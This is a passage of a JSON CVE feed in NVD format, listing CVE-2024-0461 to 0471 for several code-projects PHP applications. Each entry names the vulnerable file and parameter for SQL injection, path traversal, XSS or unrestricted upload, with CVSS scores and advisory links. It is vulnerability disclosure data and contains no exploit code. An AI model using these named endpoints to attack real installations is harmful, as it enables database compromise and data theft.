"privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-12T16:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0461", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/BxYQ/vul/blob/main/3ONLINE_FACULTY_CLEARANCE_SYSTEM%20has%20SQL1.pdf", "name" : "https://github.com/BxYQ/vul/blob/main/3ONLINE_FACULTY_CLEARANCE_SYSTEM%20has%20SQL1.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/BxYQ/vul/blob/main/3ONLINE_FACULTY_CLEARANCE_SYSTEM%20has%20SQL1.pdf", "name" : "https://github.com/BxYQ/vul/blob/main/3ONLINE_FACULTY_CLEARANCE_SYSTEM%20has%20SQL1.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250566", "name" : "https://vuldb.com/?ctiid.250566", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250566", "name" : "https://vuldb.com/?ctiid.250566", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250566", "name" : "https://vuldb.com/?id.250566", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250566", "name" : "https://vuldb.com/?id.250566", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in code-projects Online Faculty Clearance 1.0. It has been classified as critical. Affected is an unknown function of the file deactivate.php of the component HTTP POST Request Handler. The manipulation of the argument haydi leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250566 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fabianros:online_faculty_clearance_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-12T17:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0462", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/BxYQ/vul/blob/main/3ONLINE_FACULTY_CLEARANCE_SYSTEM%20has%20SQL2.pdf", "name" : "https://github.com/BxYQ/vul/blob/main/3ONLINE_FACULTY_CLEARANCE_SYSTEM%20has%20SQL2.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/BxYQ/vul/blob/main/3ONLINE_FACULTY_CLEARANCE_SYSTEM%20has%20SQL2.pdf", "name" : "https://github.com/BxYQ/vul/blob/main/3ONLINE_FACULTY_CLEARANCE_SYSTEM%20has%20SQL2.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250567", "name" : "https://vuldb.com/?ctiid.250567", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250567", "name" : "https://vuldb.com/?ctiid.250567", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250567", "name" : "https://vuldb.com/?id.250567", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250567", "name" : "https://vuldb.com/?id.250567", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in code-projects Online Faculty Clearance 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /production/designee_view_status.php of the component HTTP POST Request Handler. The manipulation of the argument haydi leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250567." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fabianros:online_faculty_clearance_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-12T18:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0463", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/BxYQ/vul/blob/main/3ONLINE_FACULTY_CLEARANCE_SYSTEM%20has%20SQL3.pdf", "name" : "https://github.com/BxYQ/vul/blob/main/3ONLINE_FACULTY_CLEARANCE_SYSTEM%20has%20SQL3.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/BxYQ/vul/blob/main/3ONLINE_FACULTY_CLEARANCE_SYSTEM%20has%20SQL3.pdf", "name" : "https://github.com/BxYQ/vul/blob/main/3ONLINE_FACULTY_CLEARANCE_SYSTEM%20has%20SQL3.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250568", "name" : "https://vuldb.com/?ctiid.250568", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250568", "name" : "https://vuldb.com/?ctiid.250568", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250568", "name" : "https://vuldb.com/?id.250568", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250568", "name" : "https://vuldb.com/?id.250568", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in code-projects Online Faculty Clearance 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /production/admin_view_info.php of the component HTTP POST Request Handler. The manipulation of the argument haydi leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250568." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fabianros:online_faculty_clearance_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-12T18:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0464", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/BxYQ/vul/blob/main/3ONLINE_FACULTY_CLEARANCE_SYSTEM%20has%20SQL4.pdf", "name" : "https://github.com/BxYQ/vul/blob/main/3ONLINE_FACULTY_CLEARANCE_SYSTEM%20has%20SQL4.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/BxYQ/vul/blob/main/3ONLINE_FACULTY_CLEARANCE_SYSTEM%20has%20SQL4.pdf", "name" : "https://github.com/BxYQ/vul/blob/main/3ONLINE_FACULTY_CLEARANCE_SYSTEM%20has%20SQL4.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250569", "name" : "https://vuldb.com/?ctiid.250569", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250569", "name" : "https://vuldb.com/?ctiid.250569", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250569", "name" : "https://vuldb.com/?id.250569", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250569", "name" : "https://vuldb.com/?id.250569", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical has been found in code-projects Online Faculty Clearance 1.0. This affects an unknown part of the file delete_faculty.php of the component HTTP GET Request Handler. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250569 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:code-projects:online_faculty_clearance:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-12T19:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0465", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/BxYQ/vul/blob/main/EMPLOYEE_PROFILE_MANAGEMENT_SYSTEM%20_FileRead.pdf", "name" : "https://github.com/BxYQ/vul/blob/main/EMPLOYEE_PROFILE_MANAGEMENT_SYSTEM%20_FileRead.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/BxYQ/vul/blob/main/EMPLOYEE_PROFILE_MANAGEMENT_SYSTEM%20_FileRead.pdf", "name" : "https://github.com/BxYQ/vul/blob/main/EMPLOYEE_PROFILE_MANAGEMENT_SYSTEM%20_FileRead.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250570", "name" : "https://vuldb.com/?ctiid.250570", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250570", "name" : "https://vuldb.com/?ctiid.250570", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250570", "name" : "https://vuldb.com/?id.250570", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250570", "name" : "https://vuldb.com/?id.250570", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as problematic was found in code-projects Employee Profile Management System 1.0. This vulnerability affects unknown code of the file download.php. The manipulation of the argument download_file leads to path traversal: '../filedir'. The exploit has been disclosed to the public and may be used. VDB-250570 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:code-projects:employee_profile_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 5.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.9, "impactScore" : 1.4 } }, "publishedDate" : "2024-01-12T19:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0466", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/BxYQ/vul/blob/main/EMPLOYEE_PROFILE_MANAGEMENT_SYSTEM%20_SQL1.pdf", "name" : "https://github.com/BxYQ/vul/blob/main/EMPLOYEE_PROFILE_MANAGEMENT_SYSTEM%20_SQL1.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/BxYQ/vul/blob/main/EMPLOYEE_PROFILE_MANAGEMENT_SYSTEM%20_SQL1.pdf", "name" : "https://github.com/BxYQ/vul/blob/main/EMPLOYEE_PROFILE_MANAGEMENT_SYSTEM%20_SQL1.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250571", "name" : "https://vuldb.com/?ctiid.250571", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250571", "name" : "https://vuldb.com/?ctiid.250571", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250571", "name" : "https://vuldb.com/?id.250571", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250571", "name" : "https://vuldb.com/?id.250571", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in code-projects Employee Profile Management System 1.0. This issue affects some unknown processing of the file file_table.php. The manipulation of the argument per_id leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250571." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:code-projects:employee_profile_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-12T19:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0467", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/BxYQ/vul/blob/main/EMPLOYEE_PROFILE_MANAGEMENT_SYSTEM_Xss.pdf", "name" : "https://github.com/BxYQ/vul/blob/main/EMPLOYEE_PROFILE_MANAGEMENT_SYSTEM_Xss.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/BxYQ/vul/blob/main/EMPLOYEE_PROFILE_MANAGEMENT_SYSTEM_Xss.pdf", "name" : "https://github.com/BxYQ/vul/blob/main/EMPLOYEE_PROFILE_MANAGEMENT_SYSTEM_Xss.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250572", "name" : "https://vuldb.com/?ctiid.250572", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250572", "name" : "https://vuldb.com/?ctiid.250572", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250572", "name" : "https://vuldb.com/?id.250572", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250572", "name" : "https://vuldb.com/?id.250572", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as problematic, was found in code-projects Employee Profile Management System 1.0. Affected is an unknown function of the file edit_position_query.php. The manipulation of the argument pos_name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250572." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:carmelogarcia:employee_profile_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-12T20:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0468", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-434" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/BxYQ/vul/blob/main/FIGHTING_COCK_INFORMATION_SYSTEM_File9docx.pdf", "name" : "https://github.com/BxYQ/vul/blob/main/FIGHTING_COCK_INFORMATION_SYSTEM_File9docx.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/BxYQ/vul/blob/main/FIGHTING_COCK_INFORMATION_SYSTEM_File9docx.pdf", "name" : "https://github.com/BxYQ/vul/blob/main/FIGHTING_COCK_INFORMATION_SYSTEM_File9docx.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250573", "name" : "https://vuldb.com/?ctiid.250573", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250573", "name" : "https://vuldb.com/?ctiid.250573", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250573", "name" : "https://vuldb.com/?id.250573", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250573", "name" : "https://vuldb.com/?id.250573", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in code-projects Fighting Cock Information System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/action/new-father.php. The manipulation of the argument image leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250573 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:code-projects:fighting_cock_information_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-12T21:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0469", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/yingqian1984/FirePunch/blob/main/11-Human%20Resource%20Integrated%20System%20has%20SQL%20injection%20vulnerabilities%20update_personal_info.php.pdf", "name" : "https://github.com/yingqian1984/FirePunch/blob/main/11-Human%20Resource%20Integrated%20System%20has%20SQL%20injection%20vulnerabilities%20update_personal_info.php.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/yingqian1984/FirePunch/blob/main/11-Human%20Resource%20Integrated%20System%20has%20SQL%20injection%20vulnerabilities%20update_personal_info.php.pdf", "name" : "https://github.com/yingqian1984/FirePunch/blob/main/11-Human%20Resource%20Integrated%20System%20has%20SQL%20injection%20vulnerabilities%20update_personal_info.php.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250574", "name" : "https://vuldb.com/?ctiid.250574", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250574", "name" : "https://vuldb.com/?ctiid.250574", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250574", "name" : "https://vuldb.com/?id.250574", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250574", "name" : "https://vuldb.com/?id.250574", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in code-projects Human Resource Integrated System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file update_personal_info.php. The manipulation of the argument sex leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250574 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:code-projects:human_resource_integrated_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-12T21:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0470", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/yingqian1984/FirePunch/blob/main/11-Human%20Resource%20Integrated%20System%20has%20SQL%20injection%20vulnerabilities%20inc_service_credits.php.pdf", "name" : "https://github.com/yingqian1984/FirePunch/blob/main/11-Human%20Resource%20Integrated%20System%20has%20SQL%20injection%20vulnerabilities%20inc_service_credits.php.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/yingqian1984/FirePunch/blob/main/11-Human%20Resource%20Integrated%20System%20has%20SQL%20injection%20vulnerabilities%20inc_service_credits.php.pdf", "name" : "https://github.com/yingqian1984/FirePunch/blob/main/11-Human%20Resource%20Integrated%20System%20has%20SQL%20injection%20vulnerabilities%20inc_service_credits.php.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250575", "name" : "https://vuldb.com/?ctiid.250575", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250575", "name" : "https://vuldb.com/?ctiid.250575", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250575", "name" : "https://vuldb.com/?id.250575", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250575", "name" : "https://vuldb.com/?id.250575", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in code-projects Human Resource Integrated System 1.0. It has been classified as critical. This affects an unknown part of the file /admin_route/inc_service_credits.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250575." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:code-projects:human_resource_integrated_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-12T21:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0471", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/yingqian1984/FirePunch/blob/main/11-Human%20Resource%20Integrated%20System%20has%20SQL%20injection%20vulnerabilities%20dec_service_credits.php.pdf", "name" : "https://github.com/yingqian1984/FirePunch/blob/main/11-Human%20Resource%20Integrated%20System%20has%20SQL%20injection%20vulnerabilities%20dec_service_credits.php.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/yingqian1984/FirePunch/blob/main/11-Human%20Resource%20Integrated%20System%20has%20SQL%20injection%20vulnerabilities%20dec_service_credits.php.pdf", "name" : "https://github.com/yingqian1984/FirePunch/blob/main/11-Human%20Resource%20Integrated%20System%20has%20SQL%20injection%20vulnerabilities%20dec_service_credits.php.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250576", "name" : "https://vuldb.com/?ctiid.250576", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250576", 